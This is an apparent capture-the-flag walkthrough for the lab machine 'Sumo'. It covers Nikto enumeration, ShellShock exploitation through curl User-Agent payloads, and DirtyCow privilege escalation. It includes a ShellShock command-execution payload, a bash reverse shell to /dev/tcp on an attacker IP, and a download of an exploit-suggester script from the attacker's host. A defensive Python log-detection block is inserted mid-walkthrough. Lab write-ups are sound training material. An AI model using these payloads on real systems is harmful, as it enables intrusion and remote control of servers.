pg-sumo-play

Exploitation Guide for Sumo
Summary

This machine is exploited by the ShellShock vulnerability. It is escalated via the DirtyCow local root exploit.

Enumeration
kali@kali:~/sumo$ nikto -h http://192.168.54.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.87
+ Target Hostname: 192.168.54.87
+ Target Port: 80
+ Start Time: 2021-09-20 15:23:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/sumo$ 

Two ports were open, so we hit the web port with Nikto; the scan above flags the CGI scripts under /cgi-bin/ as ShellShock-vulnerable.

Keeping things simple, let’s just see if this is really vulnerable:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


Excellent! We execute id and get a response. Now let's see if we can get a shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


With our handler set up:


Excellent! We catch our shell and clean up the environment. Now let's see what we're dealing with:
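As a defender-side counterpart to the probe above, here is an added example (not from the original post or any tool it mentions) that parses Apache combined-format access logs and flags requests whose User-Agent or Referer carries the `() {` function-export prefix; the log lines are constructed to mirror the requests in this write-up.

```python
"""Flag ShellShock (CVE-2014-6271) attempts in Apache combined access logs.
Constructed example for this write-up; not part of the original post."""
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Vulnerable bash treated any env var whose value began "() {" as a function
# export and kept parsing past the closing brace; whitespace is optional.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def _unescape(field):
    # Apache writes \" and \\ for quotes and backslashes inside header values.
    return field.replace('\\"', '"').replace('\\\\', '\\')

def parse_combined(line):
    """Return a dict of fields, or None if the line is not combined format."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    rec = m.groupdict()
    rec["referer"], rec["agent"] = _unescape(rec["referer"]), _unescape(rec["agent"])
    return rec

def find_shellshock_attempts(lines):
    """Return (host, request, field, targets_cgi) for each suspicious entry.
    Referer is checked too: Apache exports it as HTTP_REFERER just like
    HTTP_USER_AGENT, so the User-Agent header is not the only vector."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("agent", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["host"], rec["request"], field, "/cgi-bin/" in rec["request"]))
                break
    return hits

SAMPLE_LOG = [  # constructed entries mirroring the probe in this write-up
    '192.168.86.99 - - [20/Sep/2021:15:30:01 -0400] "GET /cgi-bin/test/test.cgi HTTP/1.1" '
    '200 54 "-" "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id"',
    '192.168.86.99 - - [20/Sep/2021:15:30:05 -0400] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [20/Sep/2021:15:31:00 -0400] "GET /cgi-bin/test.sh HTTP/1.1" 200 12 '
    '"() { :; }; /usr/bin/id" "curl/7.74.0"',
]
```

Run `find_shellshock_attempts` over a real access_log to get the offending hosts and requests; a hit against a /cgi-bin/ path on an unpatched bash is the case this box demonstrates.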

Trying to compile on the target gives a gcc error. We can fix that by extending PATH to include the gcc toolchain directory:

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Let's also try linux-exploit-suggester:

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh
wget http://192.168.49.54/linux-exploit-suggester.sh
--2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh
Connecting to 192.168.49.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'

0K .......... .......... .......... .......... .......... 57% 227K 0s
50K .......... .......... .......... ...... 100% 2.58M=0.2s

2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891]

www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass

--snip--

[+] [CVE-2012-0809] death_star (sudo)

Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436

www-data@ubuntu:/tmp$

And yes, we use DirtyCow (CVE-2016-5195):

https://github.com/FireFart/dirtycow/blob/master/dirty.c
